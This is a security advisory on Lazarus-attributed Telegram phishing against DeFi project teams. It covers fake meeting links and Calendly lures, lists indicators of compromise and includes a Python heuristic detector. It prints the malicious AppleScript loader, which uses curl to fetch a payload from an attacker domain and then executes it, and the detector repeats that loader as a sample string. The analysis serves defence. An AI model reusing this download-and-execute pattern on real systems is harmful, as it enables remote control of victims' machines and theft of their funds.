North Korean Hackers Target DeFi Projects with Sophisticated Telegram Scams

By: SlowMist Security Team

Background:

Since 2022, SlowMist Security Team has observed a significant increase in Telegram phishing campaigns targeting the cryptocurrency industry, orchestrated by the notorious North Korean hacking group Lazarus. Recently, these hackers have escalated their tactics by impersonating prominent investment firms to deceive DeFi project teams. Due to the widespread impact of these scams, SlowMist is providing a detailed analysis.

Tactics:

  1. Impersonating Investment Firms: The hackers select well-known investment firms and create fake Telegram accounts to mimic their identities.

  2. Targeting DeFi Projects: They then target prominent DeFi projects, claiming to be interested in investing. Using these fake accounts, they initiate conversations with project teams, attempting to gain their trust.

  3. Deception and Exploitation: Once a project team engages with the hackers, they often proceed with one of two attack methods:

    • Malicious Meeting Links: The hackers invite project teams to join meetings on platforms like *.group-meeting.team, pretending to schedule a meeting or discussion. They provide malicious links, which, when clicked, display region access restrictions. This prompts the project team to download and run a malicious script supposedly designed to modify their location. Once executed, the script grants the hackers control over the victim’s computer, leading to potential fund theft.

    • Calendly Phishing: The hackers exploit Calendly’s Add Custom Link feature to insert malicious links into event pages. This seamlessly blends with the project team’s daily workflow, making the links appear legitimate. Unsuspecting victims click these links, download and execute malicious code, allowing the hackers to gain access to their system information and permissions.

Example:

On November 30, 2023, SlowMist Security Team issued a warning regarding these attack methods.

Indicators of Compromise (IOCs):

  • IP: 104.168.137.21
  • Domains: *.group-meeting.team, support.group-meeting.online

Malicious Script Analysis:

The malicious script, IP_Request.scpt, is AppleScript and contains the following code:

-- remote location of the second-stage payload
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
-- fetch the payload with curl (-L follows redirects, -k skips TLS certificate checks)
set sc to do shell script "curl -L -k " & fix_url & ""
-- execute the downloaded text as AppleScript
run script sc

This code utilizes the curl command to download and execute malicious content from the specified URL.
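To turn the pattern above into something a defender can check for, here is a small heuristic scanner (an added example, not SlowMist's tooling) that flags AppleScript text combining a `do shell script` fetch via curl/wget with `run script`, and matches any embedded URL host against the IOC domains and IP listed in this article. File paths and the sample scripts are constructed for illustration.

```python
"""Heuristic detector for the curl + run script AppleScript pattern.
Added example; the IOC values are the ones quoted in the advisory."""
import re
from pathlib import Path

# Indicators from the advisory: wildcard domain, support host and IP.
IOC_DOMAINS = ("group-meeting.team", "support.group-meeting.online")
IOC_IPS = ("104.168.137.21",)

# A shell call that fetches remote content, and the AppleScript primitive
# that executes arbitrary text as a script.
RE_FETCH = re.compile(r'do shell script\s+"[^"]*\b(curl|wget)\b', re.I)
RE_RUN = re.compile(r"\brun script\b", re.I)
RE_URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def analyze_applescript(text: str) -> dict:
    """Score one AppleScript source text; score >= 2 is flagged."""
    hosts = [h.lower() for h in RE_URL.findall(text)]
    ioc_hits = sorted({h for h in hosts
                       if h in IOC_IPS
                       or any(h == d or h.endswith("." + d) for d in IOC_DOMAINS)})
    fetch, run = bool(RE_FETCH.search(text)), bool(RE_RUN.search(text))
    score, reasons = 0, []
    if fetch and run:
        score += 2
        reasons.append("remote fetch via do shell script followed by run script")
    elif fetch or run:
        score += 1
    if ioc_hits:
        score += 2
        reasons.append("contacts known IOC host(s): " + ", ".join(ioc_hits))
    return {"suspicious": score >= 2, "score": score,
            "ioc_hosts": ioc_hits, "reasons": reasons}

def scan_directory(root: str) -> list:
    """Scan *.applescript / *.scpt files under root (compiled .scpt files are
    read as text with errors ignored, so embedded strings are still seen)."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in (".scpt", ".applescript") and path.is_file():
            result = analyze_applescript(path.read_text(errors="ignore"))
            if result["suspicious"]:
                findings.append((str(path), result))
    return findings

# Constructed samples: the first mirrors the script shown above.
SAMPLE_MALICIOUS = (
    'set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"\n'
    'set sc to do shell script "curl -L -k " & fix_url & ""\n'
    'run script sc\n')
SAMPLE_BENIGN = 'set out to do shell script "ls -la ~/Documents"\ndisplay dialog out\n'
```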

Conclusion:

These sophisticated scams continue to pose a serious threat to the Web3 ecosystem. SlowMist urges all users to exercise extreme caution when adding new contacts on Telegram and to verify their identities through multiple channels. Additionally, enabling two-factor authentication (2FA) on Telegram is crucial for enhanced security. Users should remain vigilant about transaction security to prevent financial losses.

In the event of inadvertently running malicious software, immediate action is required. This includes transferring funds to secure wallets, disconnecting from the internet, running antivirus software, and changing all affected account passwords.

Note: This article is based on the provided information and aims to raise awareness about the threat. It is crucial to stay updated on the latest security advisories and best practices to protect yourself from such attacks.
